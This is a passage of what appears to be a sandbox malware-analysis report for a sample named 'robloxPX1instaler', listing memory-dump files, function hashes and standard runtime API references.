                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                  • Instruction ID: 6daa73c9cfc40e05090d29e0950614a808e74ffa52c5573c4225f1b68df362a5
                                                                                                  • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                  • Instruction Fuzzy Hash: 67E08C3291123CEBCB24DB9CD90498AF3ECEB48F01B1100D6B505E3500C270DE00CBD0
                                                                                                  Function 00B243AC Relevance: .0, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                  • Instruction ID: 959c4cc6b613ffd297cbbcab40763acb67dfea66dc0b8f4d6938408daf161bfe
                                                                                                  • Opcode Fuzzy Hash: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                  • Instruction Fuzzy Hash: 8DC08C34001D2046CE29C910F2B13EA33D5E392782F802ADCC80B0BE42C71E9C83D601
                                                                                                  Function 00B06350 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B06387
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00B0638F
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B06418
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00B06443
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B06498
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: [8$csm
                                                                                                  • API String ID: 1170836740-638191527
                                                                                                  • Opcode ID: 39cffc5554aa14590873368cc0bb699e571d89e0f84d0ae2eed6e5202f9f5f72
                                                                                                  • Instruction ID: ad8ef36fb4e85b72f84b8e00c6ad99d14f157295bb2b075efb4f8128076cb8d5
                                                                                                  • Opcode Fuzzy Hash: 39cffc5554aa14590873368cc0bb699e571d89e0f84d0ae2eed6e5202f9f5f72
                                                                                                  • Instruction Fuzzy Hash: D1419330A002099BCF10DF68D885A9EBFE5EF45324F14C195F8159B3D6DB31E965CBA1
                                                                                                  Function 00B243CE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,38E2E45B,?,?,00000000,00B4D7FB,000000FF,?,00B243A1,00000002,?,00B24375,00B1466F), ref: 00B24403
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B24415
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00B4D7FB,000000FF,?,00B243A1,00000002,?,00B24375,00B1466F), ref: 00B24437
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$[8$mscoree.dll
                                                                                                  • API String ID: 4061214504-1273806674
                                                                                                  • Opcode ID: 2235dde3f078a1bd68abad16e57ae17b79b245864614c8fe41f59e60bcc6c648
                                                                                                  • Instruction ID: f625b9573e7c52cffb83773c2147efc7422dcca299e60582d16865f0f0f41f57
                                                                                                  • Opcode Fuzzy Hash: 2235dde3f078a1bd68abad16e57ae17b79b245864614c8fe41f59e60bcc6c648
                                                                                                  • Instruction Fuzzy Hash: F5016275940669ABDB119B54DC05FAEBBB8FB08B16F104665F821B2690DF749900CB90
                                                                                                  Function 00B239C5 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 306COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 0-2721712938
                                                                                                  • Opcode ID: ff30d8e230d31d5cdde3ba95ef402c966a6bf5622b0c19771e742586a4aa51de
                                                                                                  • Instruction ID: f3f278c6411082da125f4646c44886737dccafb0327e3e34b87812bfec59a8a7
                                                                                                  • Opcode Fuzzy Hash: ff30d8e230d31d5cdde3ba95ef402c966a6bf5622b0c19771e742586a4aa51de
                                                                                                  • Instruction Fuzzy Hash: 8DA1F372E002358FDF25AF68F8997ACB7E1EB16B10F1540A9E44D7B2A1D7398E40CB51
                                                                                                  Function 00B02F6A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B02FAB
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00B03093
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
